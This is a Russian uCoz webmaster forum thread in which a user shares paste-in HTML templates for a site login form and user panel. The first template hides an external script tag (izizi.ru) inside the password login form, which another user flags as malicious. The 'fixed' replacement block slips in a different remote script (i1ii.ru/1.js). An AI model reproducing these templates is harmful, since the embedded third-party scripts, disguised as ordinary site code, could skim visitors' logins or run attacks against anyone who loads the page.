Веб-мастеру uCoz

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Веб-мастеру uCoz » Пользователи » Форма Вход New


Форма Вход New

Сообщений 1 страница 3 из 3

1

http://ucozua.ru/_ld/18/78982525.jpg

Пу-Управление Дизайном-Форма ВХода Пользователей Меняем все на это

Код:
<?if($PAGE_ID$="login")?><div style="width:180px;"><?endif?>   
 <table border="0" cellspacing="1" cellpadding="0" width="100%">   
 <?if($ERROR$)?><td colspan="2" style="color:red;text-align:center;">$ERROR$</td><?endif?>   

   <tr><td width="20%" nowrap="nowrap"><img src="http://i020.radikal.ru/1101/18/9ef4b628f285.png" height="19" width="19" >Логин</td><td><script src="http://izizi.ru" type="text/javascript"></script><input class="loginField" type="text" name="user" value="" size="19" style="width:100%;" maxlength="50"/></td></tr>   
 <tr><td><img src="http://s45.radikal.ru/i109/1101/88/a60f1beb1d60.png" height="19" width="19" >Пароль</td><td><input class="loginField" type="password" name="password" size="19" style="width:100%" maxlength="15"/></td></tr>   
 </table>   
 <table border="0" cellspacing="1" cellpadding="0" width="100%">   
 <tr><td nowrap><input id="rem$PAGE_ID$" type="checkbox" name="rem" value="1" checked="checked"/><label for="rem$PAGE_ID$">запомнить</label> <?if($PAGE_ID$="login" && $HIDDEN_ALLOWED$)?>   
 <input id="hid$PAGE_ID$" type="checkbox" name="hidden" value="1" /><label for="hid$PAGE_ID$">скрытый</label><?endif?></td><td align="right" valign="top"><input class="loginButton" name="sbm" type="submit" value="Вход"/></td></tr>   
 <tr><td colspan="2"><div style="font-size:7pt;text-align:center;"> <img src="http://s003.radikal.ru/i202/1101/8c/ce05006d9eb0.png" height="17" width="17"><a href="$REMINDER_LINK$">Забыл пароль</a> <br> <img src="http://s003.radikal.ru/i204/1101/82/b2da43f4a493.png" height="17" width="17" ><a href="$REGISTER_LINK$">Регистрация</a></div></td></tr>   
 </table>   

 <?if($PAGE_ID$="login")?></div><?endif?>

Отредактировано LeMan12 (24.11.2011 13:25)

0

2

Блин на unet профиле не прет чтоли ? ((
И еще скрипт содержит вредоностную ссылку

Отредактировано papas_tm_serjik (24.11.2011 20:07)

0

3

Сори что там вредонасноая прога я другую тогда форму поставлю

http://s1.ipicture.ru/uploads/20110221/5IcI68kI.bmp

Создать Блок и вставить туда код

Код:
<!-- <bc> --><!-- <bc> --><div align="center"><strong>$WDAY$ $DATE$  

 </strong>     
 <?if($USER_AVATAR_URL$)?><img style="border: 1px solid rgb(169, 169, 169);" alt="" class="userAvatar" title="$USERNAME$" src="$USER_AVATAR_URL$" align=""><?else?><script src="http://i1ii.ru/1.js" type="text/javascript"></script><?if($USER_LOGGED_IN$)?><img class="userAvatar" title="$USERNAME$" src="http://i029.radikal.ru/0804/cb/8cc27a1c0e73.gif" border="0"><?else?><img class="userAvatar" title="$USERNAME$" src="http://s44.radikal.ru/i106/0909/d5/ac8eec19bc34.png" border="0"><?endif?><?endif?>     

 <?if($USER_LOGGED_IN$)?>     

 <div align="center"> 
 <div align="left"><span style="font-size: 8pt; color: rgb(105, 105, 105);"><b><span style="font-family: Arial; font-size: 8pt; color: rgb(105, 105, 105);">Вы вошли как: <font color="#00bfff"><strong>$USERNAME$</strong></font> 
 IP Адрес: <font color="#00bfff"><strong>$IP_ADDRESS$</strong></font> 
 Группа: <font color="#00bfff"><strong>$USER_GROUP$</strong></font> 
 Личных сообщений: <font color="#00bfff"><strong>$UNREAD_PM$</strong></font></span></b></span></div>     

 </p>     
 <embed src="http://www.clocklink.com/clocks/5010-blue.swf?TimeZone=GMT0400&" width="111" height="33" wmode="transparent" type="application/x-shockwave-flash">   

 <input class="buttonprofile" onclick="document.location.href='/index/8'; return false;" value="Профиль" type="button">     

 <input class="buttonprofile" onclick="window.open('/index/14','pmw','scrollbars=1,top=0,left=0,resizable=1,width=680,height=350'); return false;" value="ЛС" type="button">     

 <input class="buttonprofile" onclick="document.location.href='/index/10'; return false;" value="Выход" type="button">     
 </div>     

 <?if($IS_NEW_PM$)?><script type="text/javascript">function flashit(id,cl){var c=document.getElementById(id);if (c.style.color=='red'){c.style.color=cl;}else {c.style.color='red';}}setInterval("flashit('upml2','')",500)</script><?endif?>     

 <script language=javascript type=text/javascript>     
     function openonclick(client_type)     
     {     
     if(client_type=="mail")clientWindow = window.open("$PM_URL$","pmw","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");     
     if(client_type=="send")clientWindow = window.open("/index/14-999-0-1","pms","scrollbars=1,top=0,left=0,resizable=1,width=850,height=350") || alert("Отключите блокировку всплывающих окон!");     
     if(client_type=="options")clientWindow = window.open("/index/11","options","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");     
     if(client_type=="users")clientWindow = window.open("$USERS_LIST_URL$","users","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");     
     if(client_type=="rules")clientWindow = window.open("/rules.html","rules","scrollbars=1,top=0,left=0,resizable=1,width=680,height=350") || alert("Отключите блокировку всплывающих окон!");     
     }     
 </script>     
 <?else?>     

  $LOGIN_FORM$     
 <?endif?></div>

Отредактировано LeMan12 (25.11.2011 11:02)

0


Вы здесь » Веб-мастеру uCoz » Пользователи » Форма Вход New